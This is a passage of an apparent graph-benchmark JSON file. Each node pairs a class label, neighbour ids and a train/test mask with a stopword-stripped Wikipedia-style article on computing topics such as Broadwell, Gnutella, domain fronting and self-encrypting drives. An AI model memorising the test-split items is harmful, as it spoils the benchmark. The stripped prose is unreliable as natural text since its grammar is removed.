    "neighbors": [
      735
    ],
    "mask": "Train"
  },
  {
    "node_id": 4216,
    "label": 3,
    "text": "Star_Force:star force released north america video ware arcades mega force vertically scrolling shooter released 1984 tehkan game player pilots starship called final star shooting various enemies destroying enemy structures points unlike later vertical scrolling shooters like toaplan twin cobra final star two levels weapon power secondary weapons like missiles and/or bombs stage game named letter greek alphabet certain versions game additional level called infinity represented infinity symbol occurs omega game repeats indefinitely nes version defeating omega target player see black screen tecmo logo announcing future release sequel super star force infinity target becomes available game repeats level boss without increasing difficulty star force ported published 1985 hudson soft msx home computer family computer famicom japan north american version nintendo entertainment system nes published 1987 tecmo although nes version hudson port released famicom japan tecmo made alterations graphics music control increased difficulty game also despite u.s. arcade version titled mega force tecmo decided release nes version original name star force star force also ported sg-1000 sega x68000 dempa shinbunsha mobile phones tecmo 1995 along two nes shooters famicom version star force remade hudson soft minimal upgrades super famicom part japan-only release caravan shooting collection version also included hudson compilation nes shooters 2006 hudson best collection vol 5 original arcade version later added compilation titled tecmo classic arcade released xbox 2009 arcade version made available download wii virtual console 500 wii points one four initial offerings virtual console arcade category wii shop channel three gaplus mappy tower druaga namco",
    "neighbors": [
      9093,
      7079,
      9006,
      1776,
      10931,
      599,
      5753
    ],
    "mask": "Test"
  },
  {
    "node_id": 4217,
    "label": 3,
    "text": "Broadwell_(microarchitecture):broadwell microarchitecture broadwell intel codename 14 nanometer die shrink haswell microarchitecture tick intel tick–tock principle next step semiconductor fabrication like previous tick-tock iterations broadwell completely replace full range cpus previous microarchitecture haswell low-end desktop cpus based broadwell processors based broadwell microarchitecture marketed 5th-generation core i3 i5 i7 processors moniker however used marketing broadwell-based celeron pentium xeon chips microarchitecture also introduced core processor branding broadwell h c variants used conjunction intel 9 series chipsets z97 h97 hm97 addition retaining backward compatibility intel 8 series chipsets broadwell launched three major variants broadwell introduces instruction set architecture extensions broadwell intel quick sync video hardware video decoder adds vp8 hardware decoding encoding support adds vp9 hevc 10-bit decoding support integrated gpu hevc decode achieved combination fixed function video decoder shaders also two independent bit stream decoder bsd rings process video commands gt3 gpus allows one bsd ring process decoding bsd ring process encoding time broadwell integrated gpu supports windows direct3d 11.2 opengl 4.4 opengl 4.5 linux opencl 2.0 however marketed direct3d-12-ready broadwell-e introduced intel turbo boost max technology 3.0 september 10 2013 intel showcased broadwell 14 nm processor demonstration idf intel ceo brian krzanich claimed chip would allow systems provide 30 percent improvement power use haswell chips released mid-2013 krzanich also claimed chips would ship end 2013 however shipment delayed due low yields intel 14 nm process october 21 2013 leaked intel roadmap indicated late 2014 early 2015 release k-series broadwell lga 1150 platform parallel previously announced haswell refresh would coincide release intel 9-series chipset would required broadwell processors due change power specifications lga 1150 socket reuters quoted intel ceo promising broadwell-based pcs would shelves holiday season probably back-to-school shopping mobile cpus expected q4 2014 high-performance quad-core cpus 2015 mobile cpus would benefit reduced energy consumption die shrink intel told cnet specialized broadwell-based products would q4 2014 broader availability including mobile cpus would happen 2015. broadwell cpus available intel hardware partners sample quantities intel expected release 17 broadwell u series family microprocessors ces 2015 also according leak posted vr-zone broadwell-e chips would available 2016 intel unveiled formally 14 nm manufacturing process indicated mobile variants process would known core products additionally core products announced shipping end 2014 desktop variants shipping shortly broadwell intel focused mainly laptops miniature desktops all-in-one systems left traditional desktop users new socketed cpu options beyond fourth-generation haswell first arrived 2013 even though company finally introduced two broadwell desktop chips summer 2015 launched high-end sixth-generation skylake cpus shortly thereafter september 2015 kirk skaugen senior vice president general manager intel client computing group admitted skipping desktops broadwell poor decision end-of-life windows xp 2014 lack new desktop chips intel given desktop pc users good reasons upgrade 2015 intel launched first three broadwell-based processors belong low-tdp core family core 5y10 core 5y10a core 5y70 first laptop broadwell intel core 5y70 cpu lenovo yoga 3 pro launched four broadwell based cpus launched belonging core family increasing number launched broadwell cpus seven 17 additional broadwell laptop cpus launched celeron pentium core i3 i5 i7 series intel officially launched 14 nm broadwell-ep xeon e5 v4 cpus intel officially launched 14 nm broadwell-e core i7 69xx/68xx processor family",
    "neighbors": [
      3459,
      5380,
      3973,
      8325,
      9092,
      9095,
      5386,
      9611,
      4108,
      9741,
      398,
      8719,
      5649,
      7313,
      5523,
      6804,
      8851,
      4886,
      407,
      3352,
      8855,
      9111,
      9500,
      5883,
      2088,
      10669,
      9391,
      10675,
      4276,
      1461,
      10548,
      2237,
      1085,
      5309,
      6463,
      833,
      8125,
      6339,
      5444,
      8126,
      9541,
      1998,
      2638,
      977,
      2514,
      5073,
      2516,
      597,
      5844,
      10715,
      7134,
      1119,
      5606,
      7783,
      1000,
      7657,
      8552,
      1260,
      4204,
      5356,
      5871,
      8684,
      9582,
      9970,
      499,
      8820,
      3317,
      630,
      10225,
      10734,
      4603,
      10620,
      5503
    ],
    "mask": "Test"
  },
  {
    "node_id": 4218,
    "label": 2,
    "text": "Operating_system_service_management:operating system service management computing mechanisms techniques managing services often differ operating system examples operating system service management init",
    "neighbors": [
      9540,
      6797,
      8877,
      3758,
      7983,
      5397
    ],
    "mask": "None"
  },
  {
    "node_id": 4219,
    "label": 7,
    "text": "Comparison_of_streaming_media_systems:comparison streaming media systems comparison streaming media systems complete list streaming media systems also available following tables compare general technical information number streaming media systems audio video please see individual systems linked articles information information digital container formats supported information internet protocols supported broadcasting streaming media content",
    "neighbors": [
      10368,
      8833,
      1674,
      11413,
      10270,
      6435,
      1700,
      9380,
      9381,
      6058,
      10924,
      4147,
      7991,
      823,
      8124,
      3019,
      9167,
      1107,
      6380,
      753,
      7921,
      5492
    ],
    "mask": "None"
  },
  {
    "node_id": 4220,
    "label": 3,
    "text": "Macintosh_Quadra_630:macintosh quadra 630 macintosh quadra 630 also sold macintosh lc 630 macintosh performa 630 personal computer designed manufactured sold apple computer inc. july 1994 october 1995 introduced replacement quadra 610 least-expensive computer macintosh lineup prices starting 1,199 usd apple transition powerpc cpus already begun introduction power macintosh months prior 630 built around older motorola 68040 68lc040 chips two reasons cited one older chips less expensive two powerpc-native education software almost non-existent time also existing powerpc software yet translated non-english languages 630 last new macintosh quadra introduced though earlier quadra 950 remained available longer discontinued direct replacement 630 form factor retained power macintosh 6200 introduced months earlier entry price 2,300 cost nearly twice much power macintosh 4400 apple inexpensive power macintosh 1,725 still cost several hundred dollars 630 form factor quadra 630 introduced new case design macintosh family front headphone jack volume up/down buttons included first macintosh infrared receiver intended use remote included tv tuner card included performa 637cd 638cd models case motherboard accessible opening cover bottom rear case sliding drawer motherboard mounted similar lc 575 memory 630 models 4 mb memory soldered logic board depending logic board system either one two simm slots cases first simm slot requires 80nm non-parity chips refresh rate 2k better 4 8 16 32 mb simms work second slot supports single-sided simm cards 16 mb size maximum memory therefore 52 mb two-slot systems 36 mb one-slot systems hard drive controller one big differences compared previous macintosh models choice internal hard drive interface conforming standards ibm pc compatible platform cheaper slower ide drives used instead scsi first time external scsi port still available cd-rom used scsi internally 630 used older controller much slower ones used higher-end macs time video one external monitor supported db-15 connector non-upgradeable 1 mb dram soldered motherboard provides resolution 640x480 16-bit color 832x624 8-bit color separate video card required 24-bit color higher resolutions choice use dram instead vram saves money due commonality results lower performance increased chance flickering testing macworld described video performance quadra 630 mediocre cd-rom models equipped cd-rom use apple cd 300i plus 2x-speed scsi drive capable reading 656mb 748mb data cds well audio cds caddy tray quadra 610 replaced tray-based loading mechanism remote control models equipped tv/video system included sony rmc-a1 remote control consequently remote would control macintosh compatible sony television time performance macworld magazine ran benchmarks time quadra release reported performance similar quadra 950 slightly slower 800 quadra 630 different names depending target market macintosh quadra 630 professional business use macintosh lc 630 k-12 educational market macintosh performa 630 consumer higher-education markets performa 630 sold several slightly different model numbers depending included hardware software features models included 14 shadow mask crt called apple performa plus display introduced july 1 1994 introduced july 18 1994 introduced november 3 1994 introduced april 3 1995 introduced may 1 1995 introduced july 17 1995",
    "neighbors": [
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      4139,
      7211,
      8253,
      1090,
      4180,
      10838,
      10840,
      3167,
      9312,
      8806,
      6258,
      10357,
      10365,
      10878,
      6783,
      4741,
      7305,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      4258,
      7842,
      7844,
      7869,
      8893,
      8896,
      4807,
      4810,
      1744,
      3293,
      9952,
      6884,
      6377,
      1772,
      1776,
      10481,
      1290,
      781,
      4879,
      784,
      8480,
      10023,
      4910,
      7983,
      11066,
      9022,
      10562,
      8525,
      2388,
      8534,
      3928,
      8540,
      6495,
      8544,
      11629,
      10608,
      9084,
      7549,
      11649,
      3977,
      6539,
      1428,
      3483,
      2979,
      9641,
      8109,
      1461,
      446,
      5058,
      10691,
      1482,
      9166,
      6608,
      8662,
      9174,
      10199,
      8665,
      9182,
      2023,
      5616,
      6129,
      6130,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "Test"
  },
  {
    "node_id": 4221,
    "label": 6,
    "text": "Hardware-based_full_disk_encryption:hardware-based full disk encryption hardware-based full disk encryption fde available many hard disk drive hdd vendors including istorage limited seagate technology hitachi western digital samsung toshiba also solid-state drive vendors ocz sandisk samsung micron integral memory symmetric encryption key maintained independently cpu thus removing computer memory potential attack vector relation hard disk drives term self-encrypting drive sed common usage hardware-fde two major components hardware encryptor data store currently three varieties hardware-fde common use hdd fde made hdd vendors using opal enterprise standards developed trusted computing group key management takes place within hard disk controller encryption keys 128 256 bit advanced encryption standard aes keys authentication power drive must still take place within cpu via either software pre-boot authentication environment i.e. software-based full disk encryption component hybrid full disk encryption bios password hitachi micron seagate samsung toshiba disk drive manufacturers offering tcg opal sata drives older technologies include proprietary seagate drivetrust older less secure pata security command standard shipped drive makers including western digital enterprise sas versions tcg standard called tcg enterprise drives within standard hard drive form factor case encryptor bc smaller form factor commercially available hard disk drive enclosed example viasat formerly stonewood electronics flagstone eclypt drives encryptor bridge chipset bc placed computer standard hard disk drive encrypting every sector written intel announced release danbury chipset since abandoned approach hardware-based encryption built drive within drive enclosure notably transparent user drive except bootup authentication operates like drive degradation performance complication performance overhead unlike disk encryption software since encryption invisible operating system host computers processor two main use cases data rest protection cryptographic disk erasure data rest protection laptop simply powered disk self-protects data data safe even os encrypted secure mode aes locked reading writing drive requires authentication code strong 32 bytes 2^256 unlock crypto-shredding practice 'deleting data deleting overwriting encryption keys cryptographic disk erasure crypto erase command given proper authentication credentials drive self-generates new media encryption key goes 'new drive state without old key old data becomes irretrievable therefore efficient means providing disk sanitization lengthy costly process example unencrypted unclassified computer hard drive requires sanitizing conform department defense standards must overwritten 3+ times one terabyte enterprise sata3 disk would take many hours complete process although use faster solid-state drives ssd technologies improves situation take enterprise far slow problem worsen disk sizes increase every year encrypted drives complete secure data erasure action takes milliseconds simple key change drive safely repurposed quickly sanitization activity protected seds drive key management system built firmware order prevent accidental data erasure confirmation passwords secure authentications related original key required way retrieve data erased way keys self generated randomly record anywhere protecting data accidental loss theft achieved consistent comprehensive data backup policy recent hardware models circumvents booting devices allowing access using dual master boot record mbr system whereby mbr operating system data files encrypted along special mbr required boot operating system data requests intercepted sed firmware allow decryption take place unless system booted special sed operating system load mbr encrypted part drive works separate partition hidden view contains proprietary operating system encryption management system means boot methods allow access drive typical self-encrypting drives unlocked remain unlocked long power provided researchers universität erlangen-nürnberg demonstrated number attacks based moving drive another computer without cutting power additionally may possible reboot computer attacker-controlled operating system without cutting power drive computer self-encrypting drive put sleep mode drive powered encryption password retained memory drive quickly resumed without requesting password attacker take advantage gain easier physical access drive instance inserting extension cables firmware drive may compromised data sent may risk even data encrypted physical medium drive fact firmware controlled malicious third-party means decrypted third-party data encrypted operating system sent scrambled form drive would matter firmware malicious",
    "neighbors": [
      672,
      1251,
      8900,
      9894,
      11368,
      1801,
      1515,
      7983,
      1776,
      2416,
      7794,
      2932,
      3572,
      5433,
      1978,
      2525,
      7519
    ],
    "mask": "Test"
  },
  {
    "node_id": 4222,
    "label": 8,
    "text": "WebLogic_(company):weblogic company weblogic company 1995 1998 credited creating first j2ee application server weblogic application server paul ambrose bob pasker laurie pitman carl resnikoff founded weblogic inc. september 1995 founders worked together pursue eventually became application server 1998 weblogic appointed ali kutay president ceo weblogic funded regis mckenna frank j. caufield bea systems acquired weblogic inc. 1998 oracle corporation acquired bea systems 2008",
    "neighbors": [
      3560,
      1250,
      4166
    ],
    "mask": "Test"
  },
  {
    "node_id": 4223,
    "label": 4,
    "text": "Degradation_(telecommunications):degradation telecommunications telecommunication degradation loss quality electronic signal may categorized either graceful catastrophic following meanings several forms causes degradation electric signals time domain physical domain including runt pulse voltage spike jitter wander swim drift glitch ringing crosstalk antenna effect antenna effect ic manufacturing phase noise degradation usually refers reduction quality analog digital signal signal transmitted received undergoes changes undesirable changes called degradation degradation usually caused",
    "neighbors": [
      2882,
      10675,
      6861
    ],
    "mask": "Test"
  },
  {
    "node_id": 4224,
    "label": 4,
    "text": "Domain_fronting:domain fronting domain fronting technique circumvents internet censorship obfuscating domain https connection working application layer domain fronting allows user connect service may otherwise blocked dns ip deep packet inspection one configuration large hosting service amazon s3 google app engine uses shared sni certificate containing common target https domains domain name actual blocked endpoint communicated establishment encrypted https connection http host header making invisible censors done blocked innocuous sites hosted large provider google app engine configurations allow content delivery network common https certificate infrastructure act reflector target server behind techniques work using different domain names different layers communication domain name innocuous site used initialize connection domain name exposed censor clear-text part dns request tls server name indication given domain name censors typically unable differentiate circumvention traffic legitimate traffic forced either allow traffic domain name including circumvention traffic block domain name entirely may result expensive collateral damage google disabled domain fronting april 2018 saying never supported feature google amazon also decided disable domain fronting cloudfront april 2018 claiming already handled breach aws terms service effort google amazon part due pressure russian government telegram domain fronting activity using cloud providers services",
    "neighbors": [
      10368,
      5254,
      138,
      4876,
      5135,
      1692,
      9117,
      3625,
      11693,
      10417,
      8630,
      8640,
      3777,
      11201,
      2884,
      3781,
      2887,
      2661,
      10341,
      9193,
      4725,
      5749,
      5887
    ],
    "mask": "None"
  },
  {
    "node_id": 4225,
    "label": 3,
    "text": "Openmoko:openmoko openmoko project create family open source mobile phones including hardware specification operating system openmoko linux actual smartphone development implementation like neo 1973 neo freerunner whole project sponsored openmoko inc first sub-project openmoko linux linux-based operating system designed mobile phones built using free software second sub-project developing hardware devices openmoko linux runs first device released neo 1973 ref name= openmoko.org/wiki/neo1973 /ref 2007 followed neo freerunner 25 june 2008 2 april 2009 openmoko suspended development third device codenamed gta03 focus freerunner 2010 development gta03 continued golden delicious computers new codename gta04 includes major hardware revision first unit shipped 10 october 2011 unlike mobile phone platforms phones designed provide end users ability modify operating system software stack openmoko-supported phones also available project openmoko announced 7 november 2006 founders first international computer fic initial core team openmoko project included werner almesberger michael lauer sean moss-pultz harald welte name openmoko acronym open mobile kommunikations codename phone product series gta abbreviation gsm-ti-agps indicates main components phone originally openmoko inc. developed operating system phones called openmoko linux om uses linux kernel together graphical user environment built using x.org server openembedded build framework opkg package system used create maintain software packages initial version named om 2007 used gtk+ toolkit matchbox window manager om 2008 released august 2008 added support qt toolkit enlightenment 17 despite continuous improvements versions reach stable state result openmoko started developing om 2009 goal providing stable environment based middleware freesmartphone.org project financed openmoko however version finished either april 2009 openmoko cancelled development software task taken several efforts community several groups created modified versions original software ported systems work phones among others openmoko phones support android debian gentoo qt extended improved qtmoko shr openmoko hardware aspires term open-source hardware although various areas availability cell phone components legal requirements prevent full conformance term many vendors openmoko inc. notoriously failed meet publicly announced hardware release dates postponed releases many times first supported phone neo 1973 gta01 version bv4 distributed exclusively openmoko.com july 2007 february 2008 second revision hardware based gta01 design dash express automotive navigation system dash express faster cpu samsung 2440 wi-fi ability third hardware platform neo freerunner codenamed gta02 improved version neo 1973 neo 1973 codenamed gta01 phone developers release device named first year cellular telephone communication inventor cellular phone martin cooper made first call 1973 phone released inconsistently-named neo 1973 neo1973 neo 1973 sold july 9 2007 february 2008 priced us 300 basic model us 450 kit including tools hardware work initial releases neo 1973 hampered supplier shortages forced shipping date slip hardware development difficulties exacerbated small size core team furthermore platforms ported neo 1973 including qt extended debian android phone supports 900 mhz 1800 mhz 1900 mhz gsm frequency bands many linux unix programs used desktop server platforms including utilities games successfully run phone addition linux netbsd freebsd l4 kernels adapted users run platform development hardware platform emulated software high level compatibility using version qemu included openmoko software suite shortly shipping successor neo freerunner openmoko project released cad files schematics development resources neo 1973 freerunner creative commons license cc by-sa 3.0 schematics available download openmoko creative commons attribution sharealike license neo freerunner codenamed gta02 successor neo 1973 changes include faster processor clocked 400 mhz 802.11b/g wi-fi two accelerometers 3d graphics acceleration released mass market 25 june 2008 intended users high demand customizability neo freerunner started shipping june 24 2008 priced individually us 250 us 200 purchased multiples five debug board available us 99 neo freerunner includes features present development release phone neo 1973 changes include 802.11 b/g wi-fi smedia 3362 graphics accelerator two 3d accelerometers samsung 2442 soc 256 mb flash memory 2008.08 software revision gsm phone module working reliably freerunner hardware yet fully functional software interfaces software development split qtopia x11 gtk+ fso debian also derivates openmoko main distribution shr fdom fat dirty openmoko vanilla qtopia distribution recommended openmoko users wishing use early development stage software fdom want test latest features fixes without worrying stability also possible run inferno openmoko neo freerunner android patched run openmoko neo freerunner least two different developers openwrt compiled neo freerunner neo freerunner makes appearance william gibson 2010 novel zero history phone initially used character milgrim 2 january 2008 dash express gps device hardware developed openmoko inc. announced running openmoko linux device initially codenamed hxd8 seems use little none openmoko user-interface simply using patches kernel developed openmoko inc running application dash navigation provide navigation user interface lack reference material happened gta03 codename 3d7k openmoko built 3 working prototypes capacitive touchscreens fully transparent curved case latest product openmoko inc. wikireader device read wikipedia articles offline german engineering firm golden delicious computers began producing gta04 800 mhz cortex-a8 arm 1 ghz processor 800 mhz c64x+ dsp digital signal processor core 3d graphics accelerator specifications 512mb ram combined 512mb nand flash 32gb expandable microsdhc would similar performance iphone 4 iphone 4s golden delicious gta04 board designed exchange gta02 board neo freerunner housing gta01 board neo 1973 housing release openmoko beagle hybrid platform using beagle board basis developing prototyping next generation openmoko phone following month golden delicious stated long-term goal bringing phone market new gta04 board fit neo freerunner case connected existing display components first batch gta04a3 ea early adopter started shipping 10 october 2011 version gta04a4 first batch started shipping 31 january 2012 design next revision gta04a5 contained minor relevant upgrades design parts replacement end-of-life components production crowd funded also possible order ready made phone called openphoenux gta04 complete hardware",
    "neighbors": [
      10813,
      11391,
      456,
      10760,
      6763,
      2235,
      495,
      1776,
      7983,
      1138,
      1524,
      9237,
      823,
      8122,
      1083,
      2492,
      6301,
      4479
    ],
    "mask": "None"
  },
  {
    "node_id": 4226,
    "label": 1,
    "text": "Swedish_Film_Database:swedish film database swedish film database internet database swedish films published swedish film institute contains information swedish films 1897 onwards foreign films cinema premiere sweden also provides lot biographies actors directors producers etc participated swedish films years created support bank sweden tercentenary foundation database comprises 62,000 films 17,000 swedish films 265,000 people",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 4227,
    "label": 5,
    "text": "Superframe:superframe telecommunications superframe sf t1 framing standard 1970s replaced original t1/d1 framing scheme 1960s framing bit simply alternated 0 1 superframe sometimes called d4 framing avoid confusion single-frequency signaling first supported d2 channel bank first widely deployed d4 channel bank order determine channel located stream data received set 24 channels aligned frame frame 192 bits long 8 24 terminated 193rd bit framing bit used find end frame order framing bit located receiving equipment predictable pattern sent bit equipment search bit correct pattern align framing based bit pattern sent 12 bits long every group 12 frames called superframe pattern used 193rd bit 100011 011100 channel sends two bits call supervision data superframe using robbed-bit signaling frames 6 12 superframe specifically 6th 12th bit superframe pattern least significant data bit channel bit 8 t1 data sent big-endian uses 1-origin numbering replaced channel-associated signalling bit bits b respectively superframe remained service many places turn century replaced improved extended superframe esf 1980s applications additional features desired",
    "neighbors": [
      8192,
      3156,
      2894
    ],
    "mask": "Test"
  },
  {
    "node_id": 4228,
    "label": 3,
    "text": "Wintel:wintel wintel partnership microsoft windows intel producing personal computers using intel x86-compatible processors running microsoft windows word wintel blend windows intel early 1980s chaos incompatibility rife early microcomputer market given way smaller number de facto industry standards including s-100 bus cp/m apple ii microsoft basic read-only memory rom inch floppy drive single firm controlled industry fierce competition ensured innovation hardware software rule rather exception microsoft windows intel processors gained ascendance ongoing alliance gave market dominance intel claimed partnership enabled two companies give customers benefit seemingly unending spiral falling prices rising performance addition claim history innovation shared vision flexible computing agile business 1981 ibm entered microcomputer market ibm pc created small subdivision firm unusual ibm product largely sourced outside component suppliers intended run third-party operating systems software ibm published technical specifications schematics pc allowed third-party companies produce compatible hardware so-called open architecture ibm pc became one successful computers time key feature ibm pc ibm enormous public respect behind accident history ibm pc happened intel cpu instead technically superior motorola 68000 tipped ibm in-house design shipped ibm pc dos licensed version microsoft ms-dos rather cp/m-86 operating system accidents enormous significance later years ibm pc ibm product ibm badge personal computers became respectable became easier business justify buying microcomputer even year two easiest justify buying ibm personal computer since pc architecture well documented ibm manuals pc dos designed similar earlier cp/m operating system pc soon thousands different third-party add-in cards software packages available made pc preferred option many since pc supported hardware software needed industry competitors took one several approaches changing market apple amiga atari acorn persevered independent quite different systems systems apple macintosh one remaining market macintoshes since december 2006 fact wintel-compatible hardware level least others digital world second-largest computer company hewlett-packard apricot concentrated making similar technically superior models early market leaders tandy-radio shack texas instruments stayed outdated architectures proprietary operating systems time belatedly realizing way market trends going switching successful long-term business strategy build machine duplicated ibm pc closely possible sell slightly lower price higher performance given conservative engineering early ibm personal computers higher average prices terribly difficult task first bar great technical challenge crafting bios duplicated function ibm bios exactly infringe copyrights two early leaders last strategy start-up companies columbia data products compaq first achieve reputations close compatibility ibm machines meant could run software written ibm machine without recompilation long ibm best-selling personal computer world least two next-best sellers practical purposes identical software industry effect profound first meant rational write ibm pc clones high priority port versions less common systems leisure second even importantly software writer pre-ibm days careful use plain subset possible techniques practicable able run hardware ran cp/m major part market using exact hardware similar clone practical take advantage every hardware-specific feature offered ibm independent bios companies like award chips technologies phoenix began market clean room bios 100 compatible ibm time competent computer manufacturer could achieve ibm compatibility matter routine around 1984 market fast growing relatively stable yet sign win half wintel though microsoft achieving enormous revenues dos sales ibm ever-growing list manufacturers agreed buy ms-dos license every machine made even shipped competing products intel every pc made either intel processor one made second source supplier license intel intel microsoft enormous revenues compaq many makers made far machines ibm power decide shape personal computer rested firmly ibm hands 1987 ibm introduced ps/2 computer line although open architecture pc successors great success biggest single manufacturer market buying faster cheaper ibm-compatible machines made firms ps/2s remained software compatible hardware quite different introduced technically superior micro channel architecture bus higher speed communication within system failed maintain open bus later called isa bus meant none millions existing add-in cards would function words new ibm machines ibm-compatible ibm planned ps/2 way technical legal reasons would difficult clone instead ibm offered sell ps/2 licence anyone could afford royalty would require royalty every ps/2-compatible machine sold also payment every ibm-compatible machine particular maker ever made past many pc manufacturers signed ps/2 licensees apricot lost badly persevering better pc ibm strategy time one many others many others decided hold committing major manufacturers known gang nine decided group together decide bus type would open manufacturers fast faster ibm microchannel yet still retain backward compatibility isa crucial turning point industry whole longer content let ibm make major decisions technical direction event new eisa bus commercial failure beyond high end time cost implementing eisa reduced extent would implemented desktop pcs much cheaper vesa local bus removed need desktop pcs though remained common servers due example possibility data corruption hard disk drives attached vlb controllers intel pci bus around corner although eisa systems sold achieved purpose ibm longer controlled computer industry ibm would belatedly amend ps/2 series ps/valuepoint line tracked features emerging ad hoc platform around time end 1980s beginning 1990s microsoft windows operating environment started become popular microsoft competitor digital research started recover share dos press dos market dr-dos ibm planned replace dos vastly superior os/2 originally ibm/microsoft joint venture unlike ps/2 hardware highly backward compatible microsoft preferred push industry direction product windows ibm suffering greatest ever public humiliation wake ps/2 disaster massive financial losses marked lack company unity direction microsoft combination soft marketing voice big financial stick effective windows became de facto standard competing computer manufacturers large small common factors provide joint technical leadership operating software microsoft cpus intel following years firms wintel partnership would attempt extend monopolies intel made successful major push motherboard chipset markets—becoming largest motherboard manufacturer world one stage almost chipset manufacturer—but badly fumbled attempt move graphics chip market 1991 faced sharp competition core cpu territory amd cyrix via transmeta microsoft fared better 1990 microsoft two competitors core market digital research ibm intel none 1996 intel two competitors core market cpus microsoft none microsoft pursued policy insisting per-processor royalties thus making competing operating systems unattractive computer manufacturers provoking regulatory scrutiny european commission us authorities leading undertaking microsoft cease practices however integration dos windows 95 masterstroke operating system vendors frozen microsoft could require computer manufacturers comply demands pain higher prices required ibm stop actively marketing os/2 else pay twice much windows 95 competitor compaq withholding designed windows 95 endorsement regarded essential hardware marketing tool microsoft also able require free publicity given hardware makers example windows key advertising symbols nearly modern keyboards strict license restrictions may may displayed system boot windows desktop also microsoft able take networking market formerly domain artisoft lantastic novell*s netware windows nt business application market formerly led lotus wordperfect microsoft office although microsoft far dominant player wintel partnership intel continuing influence underestimated intel microsoft closest partners operated uneasy distance one another since first major dispute intel heavy investment 32-bit optimized pentium pro microsoft delivery unexpectedly high proportion 16-bit code windows 95 firms talk one another competitors time time notably microsoft close relationship amd development windows xp professional x64 edition utilizing amd-designed 64-bit extensions x86 architecture intel decision sell processors apple inc wintel platform still dominant desktop laptop computer architecture opinions microsoft windows natural software bloat eaten much hardware progress intel processors gave wintel platform via moore law rise smartphones netbooks media outlets speculated predicting possible end wintel dominance cheap devices employing technologies intel investing linux microsoft ported windows arm architecture windows 8 strictest sense wintel refers computers run windows intel processor however wintel commonly used refer system running modern microsoft operating system modern x86 compatible cpu manufactured either intel amd pc applications run x86 intel processor usually run x86 amd processor mid-october 2017 microsoft announced windows 10 qualcomm snapdragon final stage testing would considered wintel systems running microsoft operating system using intel processor based itanium arm architecture despite fact processor manufactured intel also considered wintel system",
    "neighbors": [
      6913,
      6148,
      6797,
      8976,
      5523,
      2452,
      6419,
      9363,
      3883,
      1324,
      5681,
      178,
      4409,
      9913,
      1083,
      11068,
      10051,
      9166,
      1501,
      2273,
      7269,
      1515,
      9964,
      11627,
      6129,
      499,
      3445,
      5368,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 4229,
    "label": 5,
    "text": "Gnutella:gnutella gnutella large peer-to-peer network first decentralized peer-to-peer network kind leading later networks adopting model celebrated decade existence march 14 2010 user base millions peer-to-peer file sharing june 2005 gnutella population 1.81 million computers increasing three million nodes january 2006 late 2007 popular file-sharing network internet estimated market share 40 first client also called gnutella network got name developed justin frankel tom pepper nullsoft early 2000 soon company acquisition aol march 14 program made available download nullsoft servers event prematurely announced slashdot thousands downloaded program day source code released later gnu general public license gpl however original developers never got chance accomplish purpose next day aol stopped availability program legal concerns restrained nullsoft work project stop gnutella days protocol reverse engineered compatible free open source clones began appear parallel development different clients different groups remains modus operandi gnutella development today among first independent gnutella pioneers gene kan spencer kimball launched first portal aimed assemble open-source community work gnutella also developed gnubile one first open-source gnu-gpl programs implement gnutella protocol gnutella network fully distributed alternative semi-centralized systems fasttrack kazaa original napster initial popularity network spurred napster threatened legal demise early 2001 growing surge popularity revealed limits initial protocol scalability early 2001 variations protocol first implemented proprietary closed source clients allowed improvement scalability instead treating every user client server users treated ultrapeers routing search requests responses users connected allowed network grow popularity late 2001 gnutella client limewire basic became free open source february 2002 morpheus commercial file sharing group abandoned fasttrack-based peer-to-peer software released new client based free open source gnutella client gnucleus word gnutella today refers one project piece software open protocol used various clients name portmanteau gnu nutella brand name italian hazelnut flavored spread supposedly frankel pepper ate lot nutella working original project intended license finished program gnu general public license gnutella associated gnu project gnu peer-to-peer network gnunet october 26 2010 popular gnutella client limewire ordered shut judge kimba wood united states district court southern district new york signed consent decree recording industry plaintiffs limewire agreed event likely cause notable drop size network negotiating injunction limewire staff inserted remote-disabling code software injunction came force users installed affected versions newer 5.5.10 cut p2p network since limewire free software nothing prevented creation forks omitted disabling code long limewire trademarks used shutdown affect example frostwire fork limewire created 2004 carries neither remote-disabling code adware november 9 2010 limewire resurrected secret team developers named limewire pirate edition based limewire 5.6 beta version server dependencies removed pro features enabled free envision gnutella originally worked imagine large circle users called nodes gnutella client software initial startup client software must bootstrap find least one node various methods used including pre-existing address list possibly working nodes shipped software using updated web caches known nodes called gnutella web caches udp host caches rarely even irc connected client requests list working addresses client tries connect nodes shipped well nodes receives clients reaches certain quota connects many nodes locally caching addresses yet tried discards addresses tried invalid user wants search client sends request actively connected node version 0.4 protocol number actively connected nodes client quite small around 5 node forwarded request actively connected nodes turn forwarded request packet reached predetermined number hops sender maximum 7 since version 0.6 2002 gnutella composite network made leaf nodes ultra nodes also called ultrapeers leaf nodes connected small number ultrapeers typically 3 ultrapeer connected 32 ultrapeers higher outdegree maximum number hops query travel lowered 4 leaves ultrapeers use query routing protocol exchange query routing table qrt table 64 ki-slots 2 mi-slots consisting hashed keywords leaf node sends qrt ultrapeers connected ultrapeers merge qrt leaves downsized 128 ki-slots plus qrt share files exchange neighbors query routing done hashing words query seeing whether match qrt ultrapeers check forwarding query leaf node also forwarding query peer ultra node provided last hop query travel search request turns result node result contacts searcher classic gnutella protocol response messages sent back along route query came query contain identifying information node scheme later revised search results delivered user datagram protocol udp directly node initiated search usually ultrapeer node thus current protocol queries carry ip address port number either node lowers amount traffic routed gnutella network making significantly scalable user decides download file negotiate file transfer node requested file firewalled querying node connect directly however node firewalled stopping source node receiving incoming connections client wanting download file sends so-called push request server remote client initiate connection instead push file first push requests routed along original chain used send query rather unreliable routes would often break routed packets always subject flow control therefore so-called push proxies introduced usually ultrapeers leaf node announced search results client connects one push proxies using http request proxy sends push request leaf behalf client normally also possible send push request udp push proxy efficient using tcp push proxies two advantages first ultrapeer-leaf connections stable routes makes push requests much reliable second reduces amount traffic routed gnutella network finally user disconnects client software saves list nodes actively connected collected pong packets use next time attempts connect becomes independent kind bootstrap services practice method searching gnutella network often unreliable node regular computer user constantly connecting disconnecting network never completely stable also bandwidth cost searching gnutella grew exponentially number connected users often saturating connections rendering slower nodes useless therefore search requests would often dropped queries reached small part network observation identified gnutella network unscalable distributed system inspired development distributed hash tables much scalable support exact-match rather keyword search address problems bottlenecks gnutella developers implemented tiered system ultrapeers leaves instead nodes 